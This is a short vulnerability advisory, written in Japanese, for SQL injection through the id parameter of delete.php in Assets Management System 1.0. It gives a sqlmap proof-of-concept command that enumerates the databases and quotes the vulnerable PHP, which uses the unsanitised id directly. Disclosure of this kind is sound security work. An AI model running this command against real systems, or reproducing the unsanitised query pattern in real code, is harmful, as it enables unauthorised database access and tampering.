
説明
Assets Management System 1.0 は、delete.php の id パラメータを介して SQL インジェクションに対して脆弱です。
PoC
sqlmap -u 'http://localhost/delete.php?id=4*' --cookie="PHPSESSID=SESSID" --dbms=MySQL --dbs --batch

コードレビュー (delete.php)
<?php include 'core/init.php';
$id = $_GET['id'];
delete_data($con,$id);
header('location:home.php');
$id 変数に対するバリデーションやサニタイズは行われていません。つまり、ユーザーが id パラメータとして提供した値は、そのまま SQL クエリで使用されることを意味します。